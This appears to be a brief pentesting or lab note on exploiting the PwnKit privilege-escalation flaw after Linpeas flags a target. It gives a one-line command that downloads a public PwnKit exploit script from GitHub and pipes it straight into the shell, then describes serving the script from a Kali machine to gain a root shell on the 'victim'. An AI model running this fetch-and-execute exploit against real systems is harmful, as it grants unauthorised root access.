Pwnkit vulnerability
Run this if Linpeas.sh suggests the victim is vulnerable to this exploit.
Below is the original command:
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"Exploit part 🤞
I will download .sh file first in kali linux and start the server.
Run below command in victim machine...
After running the above command you will get the shell as root.
Last updated